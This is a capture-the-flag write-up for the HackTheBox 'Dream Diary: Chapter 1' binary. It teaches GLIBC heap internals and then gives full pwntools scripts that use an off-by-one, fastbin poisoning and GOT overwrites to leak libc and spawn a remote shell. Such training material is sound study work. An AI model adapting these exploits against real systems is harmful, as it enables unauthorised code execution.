HackTheBox – Dream Diary: Chapter 1

In this write-up we will be visiting the Dream Diary: Chapter 1 challenge from HackTheBox.

Hint: Xenial Xerus


We are given a challenge with the hint “Xenial Xerus“. This is the code name of Ubuntu 16.04, which utilizes GLIBC 2.23. Since this challenge is heavy on heap exploitation, which is a rather advanced topic, I will initiate this write-up with an introduction to heap basics.


Heap (de)allocation


Let’s start by defining how allocation and deallocation works internally when using the GLIBC library.

Initially, a heap space, also known as an arena, consists solely of the top chunk which comprise the buffer-space owned by the heap. Upon requesting a new allocation, this allocation will initially be derived from the top chunk by splitting it into two adjacent chunks. The top chunk will thus shrink for every allocation made, but has the distinct ability to grow itself by requesting more memory from the system.

Due to the inefficiency of having to split the top chunk every time a new allocation is requested, the heap will attempt to re-allocate memory into previously deallocated chunks so long as they have not been reabsorbed by the top chunk.

Below is an illustration of the above described allocation process.

Notice how the top chunk is the only chunk in the arena when no further allocations have been made. Upon requesting the allocation of a new chunk, such as A, the top chunk will split itself into two distinct chunks with the first chunk being the requested chunk and the second chunk being the remainder of the top chunk (i.e. the new top chunk).

Below is an illustration of the deallocation process using the same setup.

Every time a chunk is deallocated, it attempts to consolidate with any adjacent chunk that is also marked as not currently in use. The same holds true for the top chunk, allowing it to reabsorb any free chunk that it had previously allocated from itself. However, if two deallocated chunks are divided by an active allocated chunk (i.e. one that is currently in use), the chunks will not be able to merge.

In the above example, we see that upon deallocating only the first chunk, A, a free unused chunk is left in the middle of the arena. In constrast, we can further see that upon deallocating only the second chunk, B, which is directly adjacent to the top chunk, the top chunk consolidates backwards and reabsorbs the chunk. Likewise, in the event that both of the chunks are deallocated, the top chunk will consolidate backwards and reabsorb them both.


Heap structure(s)


We can now take a look at the internal structure(s) used by the GLIBC heap allocation system. The following illustration represents the structure of a heap with two distinct chunks.

Notice that each of the chunks contains a prev size and a size field as well as a dynamically sized buffer-space denoted by the ellipsis characters.

The prev size and size fields comprise the chunk meta data and contains information about the chunk itself while the dynamically sized buffer-space comprise the chunk user data and contains the data that was placed into the dynamically allocated buffer. Whenever you allocate a buffer using e.g. malloc, you obtain a pointer to the user data buffer, whereas the meta data buffer is reserved for internal usage by the GLIBC library.

The size field represents the size of the entire chunk including meta data. The first 3 bits of the size field are reserved for the A. M. and P bits respectively. The A and M bits are not important for now, so we will focus solely on the P bit which depicts the state of the previous adjacent chunk. If the P bit is 1, it means that the previous adjacent chunk is currently in use (allocated) and if the P bit is 0, it means that the previous adjacent chunk is not currently in use (free). We can thus call the P bit flag by its more commonly used name, the “prev in use” bit.

Finally, the prev size field represents the size of the previous adjacent chunk if said chunk is not currently in use (free), i.e. if the P bit of our current chunk is clear. Otherwise, the prev size field has no designated purpose and may be used for storage by the previous adjacent chunk.

Below follows an illustration of how the chunk structures would populate if they were allocated using the sizes 16 (0x10) for the first chunk and 32 (0x20) for the second chunk.

As illustrated above, the prev size field of the second chunk has no designated purpose since the previous adjacent chunk (the first chunk) is currently in use. The field may therefore be used for additional storage space by the previous adjacent chunk, effectively granting it 24 (0x18) bytes of storage space.

Below follows an illustration of how the chunk structures would populate if the first chunk was deallocated.

In the second chunk we can see that the prev size field has been populated and that the P bit has been cleared, effectively signaling that the previous adjacent chunk is no longer in use.

Furthermore, the beginning of the user data area of the deallocated chunk has been populated with two new fields, FD and BK. These fields pertains to so-called heap bins, which are linked lists consisting of pointers to deallocated chunks that have not been reabsorbed by the top chunk. As such, the FD field contains a forward link (a pointer to the next chunk in the linked list) and the BK field contains a backwards link (a pointer to the previous chunk in the linked list).


Heap chunk bins


When deallocated, a chunk consolidates with all adjacent chunks that are not currently in use (free) to form the largest possible free chunk. The chunk is then reabsorbed by the top chunk if the two are adjacent. However, if the two are not adjacent, the chunk and the top chunk can not be consolidated, so the chunk is instead placed in a bin for later usage.

There are two core bins – the small bin and the large bin.

A small bin is a doubly-linked list of fixed-size chunks. The heap manager controls a unique small bin for each of the 62 smallest chunk sizes available. On 64-bit systems the size of a chunk is 16-byte aligned and there are thus designated small bins for all chunks whose sizes are less then 1024 bytes. A small bin manages its entries in a First-In-First-Out (FIFO) manner, essentially making it identical to a queue.

A large bin is a doubly-linked list of chunks whose sizes fall into a specific size-range. The heap manager controls a total of 63 unique large bins with distinct size-ranges covering all sizes that are not already covered by any of the small bins. A large bin stores its entries in descending order based on chunk size.

There are also two optimization bins – the unsorted bin and the fast bin.

An unsorted bin is a doubly-linked list of arbitrarily sized chunks. The heap manager controls only a single unsorted bin, using it as a temporary cache for all deallocated chunks before they are placed in their respective bins. The unsorted bin contains its entries in an unsorted list.

A fast bin is a singly-linked list of fixed-size chunks. The heap manager controls a unique fast bin for each of the 10 smallest chunk sizes available. On 64-bit systems the size of a chunk is 16-byte aligned with 32 bytes being the smallest possible chunk size and there are thus designated fast bins for all chunks whose sizes are less then 176 bytes. A fast bin manages its entries in a Last-In-First-Out (LIFO) manner, essentially making it identical to a stack. Furthermore, a fast bin chunk is never consolidated with adjacent chunks before being stored into its respective bin.


The challenge


As with any binary exploitation challenge, we start by running checksec on the binary to see which kinds of protections are enabled.

We find that NX is enabled, which effectively means that we cannot execute contents of the stack. However, we also find that PIE is not enabled meaning that the main binary has a static location in memory starting at address 0x400000. Let’s open the binary in IDA and analyze it to find out what it does.

The main function starts by calling a function at address 0x400886.

The function at address 0x400866 prints a menu to the standard output. Once the menu has been printed, main reads a 4-byte string from the standard input which is then converted to an integer. Depending on the value of the integer, one of several actions occur.

  • If the integer is equal to 1, a function at address 0x4009a8 is invoked. The function looks as follows.
void allocate()
{
    int index = 0;

    while (index < 15)
    {
        if (chunks[index] == 0)
            break;

        index++;
    }

    if (index == 15)
        puts("Too many notes!");
    else
    {
        printf("Size: ");

        char tmp[6 + 1] = { 0 };
        read(stdin, tmp, sizeof(tmp) - 1);

        int size = atoi(tmp);
     
        chunks[index] = malloc(size);

        printf("Data: ");
        read(stdin, chunks[index], size);

        puts("Success!");
    }
}
  • If the integer is equal to 2, a function at address 0x400ac3 is invoked. The function looks as follows.
void edit()
{
    printf("Index: ");

    char tmp[4 + 1] = { 0 };
    read(stdin, tmp, sizeof(tmp) - 1);

    int index = atoi(tmp);

    if (index < 0 || index > 15)
        puts("Out of bounds!");
    else if (chunks[index] == 0)
        puts("No UAF for you!");
    else
    {
        int length = strlen(chunks[index]);

        printf("Data: ");
        read(stdin, chunks[index], length);

        puts("Done!");
    }
}
  • If the integer is equal to 3, a function at address 0x400bb1 is invoked. The function looks as follows.
void delete()
{
    printf("Index: ");

    char tmp[4 + 1] = { 0 };
    read(stdin, tmp, sizeof(tmp) - 1);

    int index = atoi(tmp);

    if (index < 0 || index > 15)
        puts("Out of bounds!");
    else if (chunks[index] != 0)
        puts("No double-free for you!");
    else
    {
        free(chunks[index]);
        chunks[index] = 0;

        puts("Done!");
    }
}

All in all we are able to perform the following actions.

  1. Allocate new heap chunks using the first function
  2. Edit existing heap chunks using the second function
  3. Delete existing heap chunks using the third function

Interestingly, the edit function uses strlen to compute the length of the buffer to overwrite. Since the strlen function counts the length of a string by incrementing a pointer untill reaching the terminating null-byte, we can exploit the edit function to perform a partial overwrite of the size field in a trailing adjacent chunk by filling our entire current chunk with non-null bytes.

With a partial overwrite of the size field in a trailing adjacent chunk, we can clear the P bit as well as populate the prev size field. This will trick the heap manager into thinking that the previous chunk is not currently in use and that it is of the size specified in the prev size field. Then, if we free the trailing adjacent chunk, it will backwards consolidate using the prev size field as an offset for the start of the previous chunk. This allows us to create overlapping chunks.

Assume that we allocate three adjacent chunks, A, B and C. Now assume that we edit B and perform a partial overwrite of the P bit in the size field of C. Additionally, we populate the prev size field of C with a value corresponding to the combined sizes of A and B, leading C to believe that its previous chunk is A and that A is as large as the combined size of A and B. Then, if we deallocate C, it will consolidate backwards with A forming a free chunk the size of all three chunks combined. If we allocate a new chunk, D, of the same size, it will span the entire space of all three chunks. However, we still have a live chunk, B, spanning a space in the middle of the D chunk. B and D are thus overlapping.

Once we have overlapping chunks, we can abuse the fast bin behaviour. If B has a fast bin size, then it will not perform consolidation upon deallocation, leaving a free fast bin chunk in the overlapping area of the D chunk. Upon freeing a fast bin chunk we also populate the FD field, which we can now overwrite by editing D, as the fast bin chunk resides inside D. Once we reallocate the fast bin chunk, the value inside its FD field will become the new head of the fast bin singly-linked list, meaning that a subsequent allocation request of a similar fast bin chunk will grant a buffer at the given address.

Since we can decide the contents of the allocated buffer, we have effectively obtained write capabilities. However, since we are allocating this buffer from the fast bin, we are required to provide a target that simulates a fast bin chunk in that it must have a size field with a size equivalent to that of the fast bin we are trying to allocate a chunk from.

A good place to target for writing data is the ptr buffer at address 0x6020c0, also referred to as chunks in my above pseudo-code snippets. This buffer is used to store all of the allocations requested in the allocate function, and as such define which buffers are available for use by the edit and delete functions. We can thus populate this list to obtain further targets for writing, although these targets will not have to simulate chunk structures.

In order to locate a fast bin compliant size field for our target buffer, we can take a look at the preceding objects such as byte_6020a8 and stderr to see if either of these can be leveraged to design a desirable chunk structure, which we can then use to populate the ptr object.

As seen in the above illustration, the stderr object contained a leading 0x7f byte and the byte_6020a8 object was null. We can use this to our advantage by offsetting the stderr object such that the leading 0x7f byte is continued by the byte_6020a8 object, effectively created a valid size field for a fast bin chunk.

Now that we have mapped out our attack path, we can visualize it. We start by allocating four distinct chunks.

Note that chunk D serves the single purpose of separating the three other chunks from the top chunk to ensure that they do not get reabsorbed upon deallocation. Note also that A and C both have sizes outside of the fast bin range, while B has a size inside the fast bin range. We can now deallocate A to mark it as free.

Now that A is marked as free, we can overflow B into C to clear the P bit as well as to set the prev size field so that C considers the free A as its previous unused chunk.

We can then deallocate C to consolidate backwards and create a free chunk overlapping with B.

We can then deallocate B to add it to the fast bin.

Now that B is in the fast bin with a forward link pointing to the empty head, we can allocate a new chunk, E, to overwrite the FD field of the free B chunk with the simulated chunk we discovered earlier. This will make it the next entry in the fast bin.

We can now reallocate B to remove it from the fast bin pushing our simulated chunk to the head of the fast bin.

The next fast bin chunk we allocate will thus point to 0x6020a0-3, at which point we can prepend our buffer with 19 (0x13) arbitrary bytes so that the remainder of our buffer will overwrite the ptr object at 0x6020c0. Now that we can overwrite the ptr object, we are able to write to any arbitrary address by inserting it into the ptr object and modifying it using the edit function.

We can now perform a ret2libc attack, in which we leak a pointer to some function in the libc shared library and use this leak as a basis for computing the addresses of the system function within the libc shared library. We can use the puts function from the .plt section to output the puts pointer from the .got section which points to the real puts function inside the libc shared library.

This can be done by overwriting the free pointer in the .got section with the address of the puts function in the .plt section and then requesting to delete a buffer inside the ptr object, which points to the puts pointer in the .got section. This will turn the apparent call of free(GOT.puts) into puts(GOT.puts), effectively outputting the address of the puts function in the .got section.

As can be seen in the illustration above, we found the puts function in the .plt section at address 0x4006e0.

As can be seen in the illustration above, we found the free pointer and the puts pointer in the .got section at the addresses 0x602018 and 0x602020 respectively. With these values at hand, we can construct the allocated buffer as shown below.

Once this chunk has been allocated, we can cause the overwrite of free by requesting edit on the chunk at index 0 with the address of the puts function in the .plt section. Afterwards, we can request delete on the chunk at index 1, causing the invocation of puts(GOT.puts), which will print the address of the puts function in the libc shared library to the standard output. We can automate this process in Python as shown below.

from pwn import *

def expand_size(size):
    temp = (size + 0x08 + 0x0f)

    if temp < 0x20:
        return 0x20
    else:
        return (temp & ~0x0f)

def allocate(s, data):
    s.sendlineafter('>> ', str(1))
    s.sendlineafter('Size: ', str(len(data)))
    s.sendlineafter('Data: ', data)
    return expand_size(len(data))

def edit(s, index, data=None):
    s.sendlineafter('>> ', str(2))
    s.sendlineafter('Index: ', str(index))

    if not data == None:
        s.sendlineafter('Data: ', data)

def delete(s, index):
    s.sendlineafter('>> ', str(3))
    s.sendlineafter('Index: ', str(index))

s = remote('165.22.114.152', 30362)

a = allocate(s, 'A' * 0xf8) # Allocate chunk 'A' (index = 0)
b = allocate(s, 'B' * 0x68) # Allocate chunk 'B' (index = 1)
c = allocate(s, 'C' * 0xf8) # Allocate chunk 'C' (index = 2)
d = allocate(s, 'D' * 0x10) # Allocate chunk 'D' (index = 3)

delete(s, 0) # Deallocate chunk 'A'

buf = 'B' * 0x60
buf += p64(a + b)
buf += p16(c)

edit(s, 1, buf) # Overflow chunk 'B' into chunk 'C'
delete(s, 2) # Deallocate chunk 'C' (consolidate backwards to chunk 'A')
delete(s, 1) # Deallocate chunk 'B' (add it to the fast bin)

buf = 'E' * 0xf0
buf += p64(0)               # prev size
buf += p64(b)               # size
buf += p64(0x6020a0 - 3)    # FD

e = allocate(s, buf) # Allocate chunk 'E' (overwrite forward link of chunk 'B')
b = allocate(s, 'B' * 0x68) # Reallocate chunk 'B' (remove it from the fast bin)

buf = 'F' * 0x13
buf += p64(0x00602018)      # GOT.free (index = 0)
buf += p64(0x00602020)      # GOT.puts (index = 1)
buf += p64(0x00602028)      # GOT.strlen (index = 2)
buf += p64(0x006020E0)      # Pointer to '/bin/sh'' (index = 3)
buf += '/bin/sh' + '\x00'   # '/bin/sh'
buf += 'F' * (0x68 - len(buf))

f = allocate(s, buf) # Allocate chunk 'F' (overwrite heap buffers)

edit(s, 0, p64(0x4006E0)) # Modify GOT.free (overwrite it with the address of PLT.puts)
delete(s, 1) # Deallocate GOT.puts (make it invoke the overwritten free => puts(GOT.puts))

glibc_puts = u64(s.recvuntil('Done!').split('\n')[1].strip().ljust(8, '\x00'))
s.info("GLIBC(puts) leak: {}".format(hex(glibc_puts)))
s.close()

We can now run our script to leak the address of the puts function inside the libc shared library on the remote system.

As can be seen in the illustration above, we were successful in leaking a pointer to puts from the libc shared library. An interesting thing to note about ASLR and libc, is that ASLR will make sure that the binaries placed at randomized addresses are always page-aligned (pages are usually 0x1000 bytes long). This effectively means that the libc shared library will be located at an address that is a multiple of 0x1000 and we can therefore conclude that the last 3 nibbles are never randomized. We can exploit this to find the correct libc version and thereby find out how to compute the address of the system function inside the libc shared library.

We use an online libc database search tool to locate a libc library in which the puts function ends in 0x690 as shown in our leak above. We find the libc version as shown in the illustration below.

From here we can see that the puts function is located at offset 0x6f690, effectively telling us that we can compute the base of the libc shared library by subtracting that value from the leaked pointer. Furthermore, we can see in the above table that we can compute the address of the system function call by adding 0x45390 to the base pointer. We can thus compute the address as shown below.

glibc = glibc_puts - 0x6f690
glibc_system = glibc + 0x45390

Once we have computed the address of the system function inside the libc shared library, we can use the function to spawn ‘/bin/sh’. This can be done by overwriting the strlen pointer in the .got section with the address of the system function in the libc shared library and then requesting to edit a buffer inside the ptr object, which points to a ‘/bin/sh’ string. This will turn the apparent call of strlen("/bin/sh") into system("/bin/sh"), which will then spawn a shell on the remote host.

As seen in an earlier illustration, we found the strlen pointer in the .got section at address 0x602028. Now that we have everything we need for our exploit, we can construct the allocated buffer as shown below.

Once this chunk has been allocated, we can cause the overwrite of the strlen pointer by requesting edit on the chunk at index 2 with the address of the system function in the libc shared library. Afterwards, we can once again request edit on the chunk at index 3, which contains a pointer to a ‘/bin/sh’ string, effectively invoking system("/bin/sh") which will spawn a shell on the remote host.

We can automate the entire exploitation process in Python as shown below.

from pwn import *

def expand_size(size):
    temp = (size + 0x08 + 0x0f)

    if temp < 0x20:
        return 0x20
    else:
        return (temp & ~0x0f)

def allocate(s, data):
    s.sendlineafter('>> ', str(1))
    s.sendlineafter('Size: ', str(len(data)))
    s.sendlineafter('Data: ', data)
    return expand_size(len(data))

def edit(s, index, data=None):
    s.sendlineafter('>> ', str(2))
    s.sendlineafter('Index: ', str(index))

    if not data == None:
        s.sendlineafter('Data: ', data)

def delete(s, index):
    s.sendlineafter('>> ', str(3))
    s.sendlineafter('Index: ', str(index))

s = remote('165.22.114.152', 30362)

a = allocate(s, 'A' * 0xf8) # Allocate chunk 'A' (index = 0)
b = allocate(s, 'B' * 0x68) # Allocate chunk 'B' (index = 1)
c = allocate(s, 'C' * 0xf8) # Allocate chunk 'C' (index = 2)
d = allocate(s, 'D' * 0x10) # Allocate chunk 'D' (index = 3)

delete(s, 0) # Deallocate chunk 'A'

buf = 'B' * 0x60
buf += p64(a + b)
buf += p16(c)

edit(s, 1, buf) # Overflow chunk 'B' into chunk 'C'
delete(s, 2) # Deallocate chunk 'C' (consolidate backwards to chunk 'A')
delete(s, 1) # Deallocate chunk 'B' (add it to the fast bin)

buf = 'E' * 0xf0
buf += p64(0)               # prev size
buf += p64(b)               # size
buf += p64(0x6020a0 - 3)    # FD

e = allocate(s, buf) # Allocate chunk 'E' (overwrite forward link of chunk 'B')
b = allocate(s, 'B' * 0x68) # Reallocate chunk 'B' (remove it from the fast bin)

buf = 'F' * 0x13
buf += p64(0x00602018)      # GOT.free (index = 0)
buf += p64(0x00602020)      # GOT.puts (index = 1)
buf += p64(0x00602028)      # GOT.strlen (index = 2)
buf += p64(0x006020E0)      # Pointer to '/bin/sh' (index = 3)
buf += '/bin/sh' + '\x00'   # '/bin/sh'
buf += 'F' * (0x68 - len(buf))

f = allocate(s, buf) # Allocate chunk 'F' (overwrite heap buffers)

edit(s, 0, p64(0x4006E0)) # Modify GOT.free (overwrite it with the address of PLT.puts)
delete(s, 1) # Deallocate GOT.puts (make it invoke the overwritten free => puts(GOT.puts))

glibc_puts = u64(s.recvuntil('Done!').split('\n')[1].strip().ljust(8, '\x00'))
glibc = glibc_puts - 0x6f690
glibc_system = glibc + 0x45390

edit(s, 2, p64(glibc_system).replace('\x7f', '\x16\x7f')) # Modify GOT.strlen (overwrite it with the address of GLIBC.system)
edit(s, 3) # Modify '/bin/sh' (make it invoke the overwrriten strlen => system('/bin/sh'))

s.interactive()
s.close()

You might notice that we prepend 0x16 to any 0x7f byte in the address of the system function from the libc shared library before sending it to the remote server. This is because the remote socat instance interprets all incoming bytes as ASCII characters, effectively turning 0x7f into a DELETE control character. We can bypass this behaviour by adding a 0x16 prefix, instructing the remote socat instance to interpret the byte literally.

We can now run our script to obtain a shell on the remote system.

And there you have it – the challenge has been solved!

Leave a Reply